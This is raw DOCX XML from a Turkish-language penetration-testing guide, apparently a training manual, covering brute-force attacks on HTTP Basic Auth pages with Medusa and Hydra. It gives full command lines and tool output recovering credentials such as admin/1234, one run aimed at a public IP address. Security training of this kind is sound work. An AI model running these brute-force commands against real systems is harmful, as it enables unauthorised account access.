              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1453AAABab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40AC04DC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1453AAACab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22434F81" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">1453AAADab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B4DCAB4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1453AAAEab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42660FC4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1453AAAFab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6077AAC4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1453AAAGab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69DF15DD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1453AAAHab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E56B85F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1453AAAIab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FEBDC5E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>1453AAAJab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A2DDDC7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA202B2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4E339D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Özel bir wordlist oluşturmak için kullanılan -t parametresi ile kullanılabilecek karakterler ve anlamları;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EFCC8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00902B70">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D44A1D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc430104857"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:t>HTTP Basic Auth Korumalı Sitelere Yönelik Brute Force</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00C37FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C22FC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B46FF55" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web basic auth korumalı web uygulamalarında kullanılan user/pass bilgisini kaba kuvvet saldırıları ile elde etme </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE1501" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan Araçlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403898E3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medusa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564E07EB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9298D8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adımlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE3B1C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Http basic auth korumalı sayfaların görünümü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E7432" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C5DC329" wp14:editId="1414E71F">
            <wp:extent cx="4166870" cy="1785620"/>
            <wp:effectExtent l="0" t="0" r="5080" b="508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1785620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C5F88" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4659B52E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Medusa ile bu sayfalara yönelik kaba kuvvet(brute force) saldırıları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="25FEF483" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7A887834" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">root@bt:~/Desktop# medusa -h 192.168.5.5 -U users.txt -P pass.txt -M http -F </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60786291" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks &lt;jmk@foofus.net&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="056A424D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ACCOUNT CHECK: [http] Host: 192.168.5.5 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 123456 (1 of 17 complete) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587E2D7B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ACCOUNT CHECK: [http] Host: 192.168.5.5 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 1 (2 of 17 complete) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA3B9A5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ACCOUNT CHECK: [http] Host: 192.168.5.5(1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 123 (3 of 17 complete) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5315F9B5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ACCOUNT CHECK: [http] Host: 192.168.5.5 (1 of 1, 0 complete) User: admin (1 of 2, 0 complete) Password: 1234 (4 of 17 complete) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D197DE2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ACCOUNT FOUND: [http] Host: </w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.5.5 </w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>User: admin Password: 1234 [SUCCESS]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40F6FBEA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2B0DEF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C26011" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-U ile denenecek kullanıcı adları bir listeden verilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC48A4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-P ile denenecek parolalar bir listeden verilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AB7499" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-M ile saldırının yapılacağı metot seçilir. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA4F430" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-F ile ilk başarılı loginde saldırının durdurulması seçilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6538B0C6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE285E1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hydra ile basic http auth. koruması olan sayfalara yönelik kaba kuvvet saldırısı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="6352EA5C" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6F36DC6E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">root@bt:~/Desktop# hydra -L users.txt -P pass.txt http://131.104.163.19/ </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B3640B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Hydra v7.3 (c)2012 by van Hauser/THC &amp; David Maciejak - for legal purposes only </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B11CC0B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Hydra (http://www.thc.org/thc-hydra) starting at 2012-11-30 11:09:00</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04CD97DE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E47D944" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0566F9B2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[WARNING] You must supply the web page as an additional option or via -m, default path set to / </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A85DC08" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[DATA] 16 tasks, 1 server, 34 login tries (l:2/p:17), ~2 tries per task </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C570BDA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[DATA] attacking service http-get on port 80 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126E8815" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[80][www] host: 131.104.163.19 login: admin password: 1234 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="356757F5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[80][www] host: 131.104.163.19 login: test password: 1234 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A63309" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">[STATUS] attack finished for 131.104.163.19 (waiting for children to finish) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B00C2B9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1 of 1 target successfuly completed, 2 valid passwords found </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="673B26F8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Hydra (http://www.thc.org/thc-hydra) finished at 2012-11-30 11:09:05</w:t>
            </w:r>
          </w:p>
        </w:tc>
